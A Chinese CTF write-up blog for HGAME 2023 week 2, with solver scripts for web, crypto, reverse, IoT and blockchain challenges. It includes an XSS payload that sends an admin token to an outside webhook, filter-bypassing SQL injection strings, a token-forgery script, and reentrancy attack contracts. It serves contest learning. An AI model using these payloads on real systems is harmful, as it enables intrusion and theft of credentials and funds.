MISC WEB CRYPTO REVERSE IOT

Hgame Week2

The Second Week of HGAME

Posted by JBNRZ on 2023-01-19
Estimated Reading Time 21 Minutes
Words 3.7k In Total
Viewed Times

Hgame: week2
Rank:

School All
1 13

Hgame 2023
Rank:

School All
1 14

可恶,没能ak WEB,sql 实在没看懂,也没花很多精力

Web

Git Leakage

  1. githack
    1
1
hgame{Don't^put*Git-in_web_directory}

V2board

  1. 一篇文章
    2
1
hgame{39d580e71705f6abac9a414def74c466}

Designer

  1. 分析源码,要求为 username=admin ip=127.0.0.1,可以通过 save 来让服务器访问,在访问部署攻击的网站前还需要先去 register,fetch 构造post 请求,以 admin 去生成一个token
1
;\"><script>eval(\"fet\"+\"ch(\\\"/user/register\\\", {\\\"method\\\":\\\"POST\\\",\\\"body\\\":{\\\"username\\\":\\\"admin\\\"}}).then((respo\"+\"nse)=>respo\"+\"nse.jso\"+\"n()).then(functio\"+\"n(respo\"+\"nse){fe\"+\"tch(\\\"https://webhook.site/cb3f84a6-2245-4654-8463-a861d2ca44af/\\\"+respo\"+\"nse[\\\"token\\\"])});\");</script>

3
4

Search Commodity

  1. 弱密码爆破(猜了几个,admin123 出了
  2. sql 注入,过滤了一些关键词,但是大小写敏感,过滤空格 和 /**/,双写绕过,过滤等号,用 like 绕过
1
2
3
4
5
6
7
8
9
10
11
12
13
14
0/*/**/*/UNION/*/**/*/SELECT/*/**/*/1,2,3
/* 2 3 */

0/*/**/*/UNION/*/**/*/SELECT/*/**/*/1,DATABASE(),3
/* se4rch 3 */

0/*/**/*/UNION/*/**/*/SELECT/*/**/*/1,(SELECT/*/**/*/GROUP_CONCAT(TABLE_NAME)/*/**/*/FROM/*/**/*/INFORMATION_SCHEMA.TABLES/*/**/*/WHERE/*/**/*/TABLE_SCHEMA/*/**/*/LIKE/*/**/*/DATABASE()),3
/*    5ecret15here,L1st,user1nf0 3 */

0/*/**/*/UNION/*/**/*/SELECT/*/**/*/1,(SELECT/*/**/*/GROUP_CONCAT(COLUMN_NAME)/*/**/*/FROM/*/**/*/INFORMATION_SCHEMA.COLUMNS/*/**/*/WHERE/*/**/*/TABLE_SCHEMA/*/**/*/LIKE/*/**/*/DATABASE()),3
/*    f14gggg1shere,id,name,number,id,u5ern4me,p4ssw0rd 3 */

0/*/**/*/UNION/*/**/*/SELECT/*/**/*/1,(SELECT/*/**/*/f14gggg1shere/*/**/*/FROM/*/**/*/5ecret15here),3
/*    hgame{4_M4n_WH0_Kn0ws_We4k-P4ssW0rd_And_SQL!} 3 */
  1. 对不起,太菜了,没发现过滤了空格 Orz

Crypto

Rabin

  1. exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from Crypto.Util.number import *
import gmpy2

p = 65428327184555679690730137432886407240184329534772421373193521144693375074983
q = 98570810268705084987524975482323456006480531917292601799256241458681800554123
c = 0x4e072f435cbffbd3520a283b3944ac988b98fb19e723d1bd02ad7e58d9f01b26d622edea5ee538b2f603d5bf785b0427de27ad5c76c656dbd9435d3a4a7cf556
e = 2
n = p * q
mp = pow(c, (p + 1) // 4, p)
mq = pow(c, (q + 1) // 4, q)
yp = gmpy2.invert(p, q)
yq = gmpy2.invert(q, p)
r = (yp * p * mq + yq * q * mp) % n
rr = n - r
s = (yp * p * mq - yq * q * mp) % n
ss = n - s
for i in [r, rr, s, rr]:
    print(long_to_bytes(i))
    
# hgame{That'5_s0_3asy_to_s@lve_r@bin}s

RSA 大冒险

  1. 分 4 个题目,基础 RSA,基础 RSA ++,低指数攻击,共模攻击
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
challenge 1
分解因数:pubkey[0] // pubkey[2]
得到 p q
# m<n_But_also_m<p

challenge 2
先 pubkey 然后 encrypt 再 pubkey 
求两次  p*q 的 gcd
用其中一次的 p q 求解
# make_all_modulus_independent

challenge 3
低指数攻击
import gmpy2
from Crypto.Util.number import *
def de(c, e, n):
    k = 0
    while True:
        mm = c + n*k
        result, flag = gmpy2.iroot(mm, e)
        if True == flag:
            return result
        k += 1
e= 3
n= 
c= 
m=de(c,e,n)
print(long_to_bytes(m))
# encrypt_exponent_should_be_bigger

challenge 4
获取顺序: pubkey encrypt pubkey encrypt
共模攻击
import gmpy2
from Crypto.Util.number import long_to_bytes
e1 = 98911
e2 = 122099
n = 95048467482095047194913076481132162965250112913068812808848027402319725614813995098584762490966765657917174429652739462495760382099969326230762073171467755201990428927237663400477628823765429956962042870978196151009933065958581126995302573390078723690059805801261153097824043348480889858586169817262504654753
c1 = 0x1e1ed86e90f31b5827d3b975e3039592a90d64674c691f6d142482930a3e761cffbbe0bef10c1334939040d1e2c1ae4ffb2411d36533f9c8232f7d2b50dc7b9ea22bfac849e20fcbdae390710ce4d282c06ecf16c1d342c30e63c59d444943895e0361dea98bd74e7dccda48e79fe8cd712cb6352a2aa72a058b78082f9f9f06
c2 = 0x45b1ff36c4363240047c744dab838ca660d14a9434b30eea3eea0a90fd1292bda96ee5e536f0ff3a8335ed08d786082898f9a1a0315c6370f6f42fb9c4b880487a2c76bf49810aa277dfcf91641ec6940a8598c3ae53d1d0959c5ae187984fa124e4ee7b1c35cf8b39dddfa2747e4268f693ed0798802a737a7c0ce63514959c
_, r, s = gmpy2.gcdext(e1, e2)
m = pow(c1, r, n) * pow(c2, s, n) % n
print(long_to_bytes(m))
# never_uese_same_modulus
  1. flag
1
hgame{W0w_you^knowT^e_CoMm0n_&t$ack_@bout|RSA}

Bag

  1. Wiki 中的描述
  2. bilibili 得讲解
  3. 计算可能得 w
1
2
3
4
5
6
7
from z3 import *
m = 1528637222531038332958694965114330415773896571891017629493424
w = Int('w')
solve(w * 2 % m == m, w > 0, w < m)

# w = 34678303266662728260484388017365107292555268466494656568963
# w 两个值,但没差别
  1. exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from gmpy2 import invert
c = 93602062133487361151420753057739397161734651609786598765462162
w1 = 34678303266662728260484388017365107292555268466494656568963
m = 1528637222531038332958694965114330415773896571891017629493424
_w = invert(w1, m)
_c = c * _w % m
d = ''
a = [2 << i for i in range(198)][::-1]
while _c >= 2 and len(a) >= 1:
    if _c >= sum(a):
        _c -= sum(a)
        d += '1'
    else:
        d += '0'
    a = a[1:]
print(d[::-1])

# 100100000110000100111011100110101111100110100011011100101111100110011011000010111001101111001010111110110001001100001001110010101111101101001011100110110111000110111010111110110100101110100001111110
  1. 补 0
    5
  2. 爆破错误的位
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from libnum import gcd, s2n
from string import printable
for x in printable:
    for y in printable:
        plain = f"{x}{y}'s_4n_3asy_ba9_isn7_it?"
        v = bin(s2n(plain))[2:]
        l = len(v)
        a = [2 << i for i in range(l)]
        m = 1528637222531038332958694965114330415773896571891017629493424
        w = 34678303266662728260484388017365107292555268466494656568963
        assert gcd(w, m) == 1
        b = [w * i % m for i in a]
        c = 0
        for i in range(l):
            c += b[i] * int(v[i])
        if c == 93602062133487361151420753057739397161734651609786598765462162:
            print(plain)

# 1t's_4n_3asy_ba9_isn7_it?
  1. Official
    14

零元购年货商店

  1. 审计一下代码,要求购买flag时token解出的username要求是 Vidar-Tu,但是不可能注册一个 Vidar-Tu,要伪造token
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
func init() {
    _, _ = rand.Read(key)
    _, _ = rand.Read(iv)
}

func Encrypt(u string) (string, error) {
    block, err := aes.NewCipher(key)
    if err != nil {
        return "", err
    }
    plainText := []byte(u)
    blockMode := cipher.NewCTR(block, iv)
    cipherText := make([]byte, len(plainText))
    blockMode.XORKeyStream(cipherText, plainText)
    return base64.StdEncoding.EncodeToString(cipherText), nil
}
  1. 在这部分代码中发现对于 token 的生成采用 AES.CTR 算法,并且存在 key iv 复用的情况,通过写代码获取 username = Vidar-Tu 的 token
  2. 生成 token
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import base64
import time
from pwn import xor
from requests import Session

login = 'http://week-2.hgame.lwsec.cn:30543/login'
s = Session()
s.post(login, data={'username': 'Vidar-TU'})
created = round(time.time())
text1 = ('{"Name":"Vidar-TU","Created":' + str(created) + ',"Uid":"230555433"}').encode()
# 虽然不知道用没用,将两个明文的差别尽可能缩小,时间戳无所谓,没有相关校验
text2 = ('{"Name":"Vidar-Tu","Created":' + str(created) + ',"Uid":"230555433"}').encode()
text3 = base64.b64decode(s.cookies.get('token').replace('%3D', '='))
text4 = base64.b64encode(xor(text1, text2, text3))
print(text4.decode())

# lhIqIpkzHTAlnuvFwKbPneKFFov96RVsRRLMuIXwmjZhLBexg2Hnx1c%2BJluWtcwtkD6tqJmmzf4w3A%3D%3D

# 直接得到的结果中间的 %2B 变成了 2B,修正一下
  1. 抓包改token -> hgame{5o_Eas9_6yte_flip_@t7ack_wi4h_4ES-CTR}
    6

Misc

Tetris Master

  1. Crtl-C 可退出程序,进入 shell
1
hgame{Bash_Game^Also*Can#Rce}

Tetris Master ++

  1. 在死后 score 不会归零,写脚本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from pyautogui import *
from time import sleep


for i in range(10):
    print(f"计时: {i}")
    sleep(1)
while True:
    for i in range(12):
        press('enter')
        print(i, end=' ')
    press('n')
    sleep(0.1)

# hgame{Bash_Game^Also*Can#Rce^reVenge!!!!}

Sign in pro max

  1. part1 base64 58 32; part2 md5; part3 sha1; part4 sha256; part5 凯撒
  2. 按照 uuid 生成的格式补齐
1
hgame{f51d3a18-f91c-4952-a3ed-0bc0ea61d21c}

Crazy qrcode

  1. 掩码出现错误,选择正确的掩码 qrazybox,正确的应为 mask pattern 4
    7
  2. 解压缩后拼一下,文本文件中内容应该是旋转的角度
    8

拼的似乎不完全正确,但是不影响扫码

  1. flag
1
hgame{Cr42y_qrc0de}
  1. 关于 QRcode 的介绍

Reverse

Stream

  1. pyinstaller 的反编译:pyinstxtractor stream.exe> stream.pyc > stream.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#!/usr/bin/env python
# visit https://tool.lu/pyc/ for more information
# Version: Python 3.10

import base64

def gen(key):
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + ord(key[i % len(key)])) % 256
        tmp = s[i]
        s[i] = s[j]
        s[j] = tmp
    i = j = 0
    data = []
    for _ in range(50):
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        tmp = s[i]
        s[i] = s[j]
        s[j] = tmp
        data.append(s[(s[i] + s[j]) % 256])
    return data


def encrypt(text, key):
    result = ''
    for c, k in zip(text, gen(key)):
        result += chr(ord(c) ^ k)
    result = base64.b64encode(result.encode()).decode()
    return result

text = input('Flag: ')
key = 'As_we_do_as_you_know'
enc = encrypt(text, key)
if enc == 'wr3ClVcSw7nCmMOcHcKgacOtMkvDjxZ6asKWw4nChMK8IsK7KMOOasOrdgbDlx3DqcKqwr0hw701Ly57w63CtcOl':
    print('yes!')
    return None
None('try again...')
  1. 爆破脚本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
import base64
from string import printable as p
def gen(key):
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + ord(key[i % len(key)])) % 256
        tmp = s[i]
        s[i] = s[j]
        s[j] = tmp
    i = j = 0
    data = []
    for _ in range(50):
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        tmp = s[i]
        s[i] = s[j]
        s[j] = tmp
        data.append(s[(s[i] + s[j]) % 256])
    return data

def encrypt(text, key):
    result = ''
    for c, k in zip(text, gen(key)):
        result += chr(ord(c) ^ k)
    result = result.encode()
    return result

decoded = base64.b64decode('wr3ClVcSw7nCmMOcHcKgacOtMkvDjxZ6asKWw4nChMK8IsK7KMOOasOrdgbDlx3DqcKqwr0hw701Ly57w63CtcOl')
decoded = ' '.join([str(i) for i in list(decoded)])
# print(decoded)
text = 'hgame{'
key = 'As_we_do_as_you_know'
while not text.endswith('}'):
    for y in p:
        test = ' '.join([str(i) for i in list(encrypt(text + y, key=key))]) + ' '
        if decoded.startswith(test):
            text += y
            print(text)
            
# hgame{python_reverse_is_easy_with_internet}

Math

  1. solve 大法好
1
2
3
4
5
6
7
8
9
10
11
12
13
from z3 import *
s = Solver()
v10 = [126, 225, 62, 40, 216, 253, 20, 124, 232, 122, 62, 23, 100, 161, 36, 118, 21, 184, 26, 142, 59, 31, 186, 82, 79]
v12 = [63998, 33111, 67762, 54789, 61979, 69619, 37190, 70162, 53110, 68678, 63339, 30687, 66494, 50936, 60810, 48784, 30188, 60104, 44599, 52265, 43048, 23660, 43850, 33646, 44270]
c = [Int(str(i)) for i in range(25)]
s.add(v12[0] ==c[0] * v10[0]+c[1] * v10[5]+c[2] * v10[10]+c[3] * v10[15]+c[4] * v10[20], v12[1] ==c[0] * v10[1]+c[1] * v10[6]+c[2] * v10[11]+c[3] * v10[16]+c[4] * v10[21], v12[2] ==c[0] * v10[2]+c[1] * v10[7]+c[2] * v10[12]+c[3] * v10[17]+c[4] * v10[22], v12[3] ==c[0] * v10[3]+c[1] * v10[8]+c[2] * v10[13]+c[3] * v10[18]+c[4] * v10[23], v12[4] ==c[0] * v10[4]+c[1] * v10[9]+c[2] * v10[14]+c[3] * v10[19]+c[4] * v10[24], v12[5] ==c[5] * v10[0]+c[6] * v10[5]+c[7] * v10[10]+c[8] * v10[15]+c[9] * v10[20], v12[6] ==c[5] * v10[1]+c[6] * v10[6]+c[7] * v10[11]+c[8] * v10[16]+c[9] * v10[21], v12[7] ==c[5] * v10[2]+c[6] * v10[7]+c[7] * v10[12]+c[8] * v10[17]+c[9] * v10[22], v12[8] ==c[5] * v10[3]+c[6] * v10[8]+c[7] * v10[13]+c[8] * v10[18]+c[9] * v10[23], v12[9] ==c[5] * v10[4]+c[6] * v10[9]+c[7] * v10[14]+c[8] * v10[19]+c[9] * v10[24], v12[10] ==c[10] * v10[0]+c[11] * v10[5]+c[12] * v10[10]+c[13] * v10[15]+c[14] * v10[20], v12[11] ==c[10] * v10[1]+c[11] * v10[6]+c[12] * v10[11]+c[13] * v10[16]+c[14] * v10[21], v12[12] ==c[10] * v10[2]+c[11] * v10[7]+c[12] * v10[12]+c[13] * v10[17]+c[14] * v10[22], v12[13] ==c[10] * v10[3]+c[11] * v10[8]+c[12] * v10[13]+c[13] * v10[18]+c[14] * v10[23], v12[14] ==c[10] * v10[4]+c[11] * v10[9]+c[12] * v10[14]+c[13] * v10[19]+c[14] * v10[24], v12[15] ==c[15] * v10[0]+c[16] * v10[5]+c[17] * v10[10]+c[18] * v10[15]+c[19] * v10[20], v12[16] ==c[15] * v10[1]+c[16] * v10[6]+c[17] * v10[11]+c[18] * v10[16]+c[19] * v10[21], v12[17] ==c[15] * v10[2]+c[16] * v10[7]+c[17] * v10[12]+c[18] * v10[17]+c[19] * v10[22], v12[18] ==c[15] * v10[3]+c[16] * v10[8]+c[17] * v10[13]+c[18] * v10[18]+c[19] * v10[23], v12[19] ==c[15] * v10[4]+c[16] * v10[9]+c[17] * v10[14]+c[18] * v10[19]+c[19] * v10[24], v12[20] ==c[20] * v10[0]+c[21] * v10[5]+c[22] * v10[10]+c[23] * v10[15]+c[24] * v10[20], v12[21] ==c[20] * v10[1]+c[21] * v10[6]+c[22] * v10[11]+c[23] * v10[16]+c[24] * v10[21], v12[22] ==c[20] * v10[2]+c[21] * v10[7]+c[22] * v10[12]+c[23] * v10[17]+c[24] * v10[22], v12[23] ==c[20] * v10[3]+c[21] * v10[8]+c[22] * v10[13]+c[23] * v10[18]+c[24] * v10[23], v12[24] ==c[20] * v10[4]+c[21] * v10[9]+c[22] * v10[14]+c[23] * v10[19]+c[24] * v10[24])
# 代码生成所有的约束条件
if s.check() == sat:
    m = eval(str(s.model()).replace(' = ', ': ').replace('[', '{').replace(']', '}'))
    for i in range(25):
        print(chr(m[i]), end='')

# hgame{y0ur_m@th_1s_gO0d}

VidarCamera

  1. 先放着
    15

Before main

  1. 两张 base64 表
1
2
true: qaCpwYM2tO/RP0XeSZv8kLd6nfA7UHJ1No4gF5zr3VsBQbl9juhEGymc+WTxIiDK
false: 0CxWsOemvJq4zdk2V6QlArj9wnHbt1NfEX/+3DhyPoBRLY8pK5FciZau7UMIgTSG
  1. 换表
    9
    10
    11

IOT

Pirated router

  1. 路由器固件文件,kali 自带的不完整,在 ubuntu 上重装一个
1
binwalk -eM xxx.bin
  1. 在 bin 中发现文件 secret_program,IDA 查看逻辑
1
2
3
4
5
a = [75, 68, 66, 78, 70, 88, 86, 77, 83, 23, 64, 72, 18, 77, 68, 124, 69, 74, 81, 78, 84, 66, 81, 70, 124, 18, 80, 124, 16, 98, 80, 90]
a = [i ^ 35 for i in a]
print(''.join([chr(i) for i in a]))

# hgame{unp4ck1ng_firmware_1s_3Asy}

Priated Keyboard

  1. 分离键盘流量
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
f = open('usb.txt', 'r')
fi = open('out.txt', 'w')
while True:
    a = f.readline().strip()
    if a:
        if len(a) == 16:  # 键盘流量len=16,鼠标流量len=8
            out = ''
            for i in range(0, len(a), 2):
                if i + 2 != len(a):
                    out += a[i] + a[i + 1] + ":"
                else:
                    out += a[i] + a[i + 1]
            fi.write(out)
            fi.write('\n')
    else:
        break
fi.close()
normalKeys = {
    "04": "a", "05": "b", "06": "c", "07": "d", "08": "e",
    "09": "f", "0a": "g", "0b": "h", "0c": "i", "0d": "j",
    "0e": "k", "0f": "l", "10": "m", "11": "n", "12": "o",
    "13": "p", "14": "q", "15": "r", "16": "s", "17": "t",
    "18": "u", "19": "v", "1a": "w", "1b": "x", "1c": "y",
    "1d": "z", "1e": "1", "1f": "2", "20": "3", "21": "4",
    "22": "5", "23": "6", "24": "7", "25": "8", "26": "9",
    "27": "0", "28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t",
    "2c": "<SPACE>", "2d": "-", "2e": "=", "2f": "[", "30": "]", "31": "\\",
    "32": "<NON>", "33": ";", "34": "'", "35": "<GA>", "36": ",", "37": ".",
    "38": "/", "39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>",
    "3e": "<F5>", "3f": "<F6>", "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>",
    "44": "<F11>", "45": "<F12>"}
shiftKeys = {
    "04": "A", "05": "B", "06": "C", "07": "D", "08": "E",
    "09": "F", "0a": "G", "0b": "I", "0c": "H", "0d": "J",
    "0e": "K", "0f": "L", "10": "M", "11": "N", "12": "O",
    "13": "P", "14": "Q", "15": "R", "16": "S", "17": "T",
    "18": "U", "19": "V", "1a": "W", "1b": "X", "1c": "Y",
    "1d": "Z", "1e": "!", "1f": "@", "20": "#", "21": "$",
          "22": "%", "23": "^", "24": "&", "25": "*", "26": "(", "27": ")",
          "28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>",
          "2d": "_", "2e": "+", "2f": "{", "30": "}", "31": "|", "32": "<NON>", "33": "\"",
          "34": ":", "35": "<GA>", "36": "<", "37": ">", "38": "?", "39": "<CAP>", "3a": "<F1>",
          "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>", "40": "<F7>",
          "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}
output = []
keys = open('usb2.txt')
for line in keys:
    try:
        if line[0] != '0' or (line[1] != '0' and line[1] != '2') or line[3] != '0' or line[4] != '0' or line[9] != '0' or line[10] != '0' or line[12] != '0' or line[
                13] != '0' or line[15] != '0' or line[16] != '0' or line[18] != '0' or line[19] != '0' or line[21] != '0' or line[22] != '0' or line[6:8] == "00":
            continue
        if line[6:8] in normalKeys.keys():
            output += [[normalKeys[line[6:8]]],
                       [shiftKeys[line[6:8]]]][line[1] == '2']
        else:
            output += ['[unknown]']
    except BaseException:
        pass
keys.close()
flag = 0
print("".join(output))
for i in range(len(output)):
    try:
        a = output.index('<DEL>')
        del output[a]
        del output[a - 1]
    except BaseException:
        pass
for i in range(len(output)):
    try:
        if output[i] == "<CAP>":
            flag += 1
            output.pop(i)
            if flag == 2:
                flag = 0
        if flag != 0:
            output[i] = output[i].upper()
    except BaseException:
        pass
print('output :' + "".join(output))

# zihiui_NB_666}
  1. 对比附件和原仓库的差别,将字母修正一下
    12
  2. 在 SCH_HelloWord-TouchBar_2022-07-31.pdf 中发现前半段flag
    13
1
hgame{peng_zhihuh_NB_666}
  1. 挖个坑:写一个批量对比文件的脚本

Blockchain

VidarBank

  1. 重入攻击(call 函数引起
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
contract attack {
    VidarBank public victim;
    constructor (address _addr){
        victim = VidarBank(_addr);
    }
    fallback() external payable {
        if(victim.balances(address(this)) < 30){
            victim.donateOnce();
    }
    }
    function exploit() public payable {
        victim.newAccount{value: 0.001 ether}();
        victim.donateOnce();
        victim.isSolved();
    }
}

Transfer

  1. self destruct 自毁强制转账
1
2
3
4
5
6
7
8
9
contract attack {
    Transfer public victim;
    constructor(address _addr){
        victim = Transfer(_addr);
    }
    function Hack() public payable {
        selfdestruct(payable(address(victim)));
    }
}

如果您喜欢此博客或发现它对您有用,则欢迎对此发表评论。 也欢迎您共享此博客,以便更多人可以参与。 如果博客中使用的图像侵犯了您的版权,请与作者联系以将其删除。 谢谢 !

特色标签
MISC WEB CRYPTO REVERSE IOT
链友
ESC